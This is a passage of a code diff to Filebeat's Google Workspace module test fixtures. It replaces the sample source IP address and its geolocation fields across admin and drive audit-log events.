@@ -4124,27 +3840,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 30147, + "log.offset": 30076, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4168,7 +3880,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -4181,26 +3893,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 30532, + "log.offset": 30460, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4221,7 +3929,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "info", 
@@ -4234,27 +3942,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 30972, + "log.offset": 30899, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", diff --git a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log index 3cd073a73790..aa82eee6fe5e 100644 --- a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log +++ b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log 
@@ -1,28 +1,28 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
